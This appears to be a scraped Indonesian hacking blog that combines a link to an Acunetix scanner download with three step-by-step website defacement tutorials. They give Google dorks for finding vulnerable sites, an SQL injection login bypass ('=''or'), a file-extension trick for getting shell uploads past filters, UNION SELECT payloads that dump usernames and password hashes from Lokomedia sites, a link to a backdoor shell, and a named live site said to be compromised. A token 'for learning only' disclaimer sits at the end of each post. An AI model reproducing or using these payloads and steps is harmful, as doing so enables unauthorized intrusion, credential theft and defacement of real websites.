Download acunetix web vulnerability scanner V.9

Download acunetix web vulnerability scanner V.9

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Download acunetix web vulnerability scanner V.9

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Acunetix adalah software untuk men-Scan kelemahan pada sebuah situs atau site. Menurut saya sendiri aplikasi ini sangata bagus, Menurut saya sendiri aplikasi ini memberikan 70% bug. Wow

langsung saja download jika kalian tidak percaya

Download Acunetix 

Sekianlah Postingan Dari All Tutor Cyber tentang "Download acunetix web vulnerability scanner V.9" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Download acunetix web vulnerability scanner V.9" Dengan URL https://ryangueltoem.blogspot.co.id/
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Add Comment

FB Comments

Deface Metode Webdav [Shell Upload]

Deface Metode Webdav [Shell Upload]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Webdav [Shell Upload]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Mungkin di sini ada yang gak tau tentang Webdav??? Jika ingin tau tentang webdav baca aja di post post yg lama atau bisa juga DI SINI 

Bahan Bahan :

1. Dork Webdav

inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp

2. Webdav dan Shell Marker [Di Sini]
3. Script Deface [Di Sini]
4. Kesabaran

Step By Step :

1. Dorking Dork di atas menggunakan Gogle/Mozilla atau yg lainnya

2. Buka Webdav Pilih Webdav Kemudian Asp Shell Marker 

3. Click Setting > Load Shell From Pile (Pilih Asp Shell marker yang udah kalian Download tadi) 

Name Of Your Shell. Untuk mengubah nama shell ente tadi 

(Lihat Gambar Supaya Lebih Jelas)

4. Click Add Site > Masukkan target/Web yang akan di Deface 

5. Kemudia Click Serang 

Tinggal akses shellnya di Browsing kalian 

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Metode Webdav [Shell Upload]" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Deface Metode Webdav [Shell Upload]" Dengan URL https://ryangueltoem.blogspot.co.id/
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Add Comment

FB Comments

Deface Dengan Bypass Admin [ TERBARU ]

Deface Dengan Bypass Admin [ TERBARU ]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Udah lama gak pernah ngposting artikel lagi :v maklum lagi sibuk dunia nyata, ngurus pacar wkwkwk :v
Disini saya dengan nick GU3LT03M akan memposting tutorial Bypass Admin lengkap dengan dork fresh auto dapet web vuln, kalau ga dapet berarti kurang tamvan :v

Kali ini saya sendiri (Admin) Akan memberikan Deface Dengan Bypass Admin [ TERBARU ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan Bahan :

1. Dork ( Lihat di bawah )
2. Shell Backdoor ( kalau gagal upload extensi .php coba diganti jadi .php.pjpeg atau .php.xxxjpg )
3. Wajah yang tampan :) seperti admin GU3LT03M yang kegantengannya make banget :)
4. Kesabaran :)

Dork :
    inurl:/admin/upload/ "intext"
    inurl:/admin/ "product"
    inurl :/adm/img/ site:com
    inurl:/admin/image/

Dork diatas dorking melalui google images


Oke, langsung saja simak tutorialnya di bawah ini :)

Step By Step :

1. Dorking dork tadi di google images.
Misal saya pakai dork : inurl:/admin/upload/ "academy"

2. Pilih salah satu gambar, lalu pilih "Lihat gambar"

3. Jika sudah buka gambarnya, tinggal masuk ke patch admin ( tempat login )

Nanti akan masuk ke admin login, tinggal masukkan username : '=''or' sama passwordnya : '=''or'

4. Jika vuln, nanti akan masuk ke dashboard admin.

5. Tinggal cari tempat upload'an file atau gambar, lalu upload shell kalian.

6. Jika sudah terupload, tinggal kalian cari shell yang kalian upload tadi, lalu klik kanan pada shell kalian dan pilih open image in new tab.

7. Dan Tarrraaaa.... Shellnya berhasil di akses :) sekarang bebas mau kalian apain aja :) mau upload file aja atau ngemass deface index :v

Dan ini hasil ngeue tadi : www.shrikrishnascientific.in/touched.php :v Tinggal kalian upload aja ke web mirror kesukaan kalian :v

Mohon kepada yang ingin menggunakan live target jangan merusak admin loginnya :) karena masih banyak yang ingin belajar :)

NB : Jika sudah masuk dashboard admin tapi gabisa upload shell, silahkan tambahkan script JSO pada bagian artikel atau tambahin pada bagian title, nanti akan release tutorial Bypass admin JSOverlay.

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Dengan Bypass Admin [ TERBARU ]" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Deface Dengan Bypass Admin [ TERBARU ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/11/deface-dengan-bypass-admin-terbaru.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Add Comment

FB Comments

Deface SQL Lokomedia Full

Deface SQL Lokomedia Full 

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface SQL Lokomedia Full 

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Baiklah kembali lagi dengan saya Adewa. Kali ini saya akan memberikan tutorial Deface SQL Lokomedia Full

Siapkan dulu alat alat dan bahan

Bahan Bahan

1. Dork = inurl:statis--profil.html

                inurl:statis--profil.html

                inurl:statis--strukturorganisasi.html 

     (Kembangin dorknya biar makin JOS)
2. Exploit 

    Exploit 1.=  'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

     Exploit 2  =  'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---

3. Shell Backdoor = https://pastebin.com/nC6pWh5a (Punya indoXploit)

4. Script Deface = Di Sini

Step By Step 

1. Dorking dulu dork di atas

2. Jika sudah masukin exploit di atas (Pilih salah satu aja). Jika Vuln akan ada <LI> atau apalah di title web

(Seperti Ini)

3. Tekan CTRL+U di keyboard. Akan ada username dan passwordnya

Catatan= password masih berbentuk md5 

4. Crack Passwordnya Di Sini atau di sini https://hashkiller.co.uk/md5-decrypter.aspx

Crack Seperti Ini 

5. Tinggal cari aja login adminnya 

site/admin

site/administrator

site/redaktur

site/adminweb

site/admin.php

(Use Your Brain)

6. Upload Shell 

Croott deh sepuas kalian

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface SQL Lokomedia Full " Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface SQL Lokomedia Full " Dengan URL https://ryangueltoem.blogspot.co.id/2017/11/deface-sql-lokomedia-full.html

Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Add Comment

FB Comments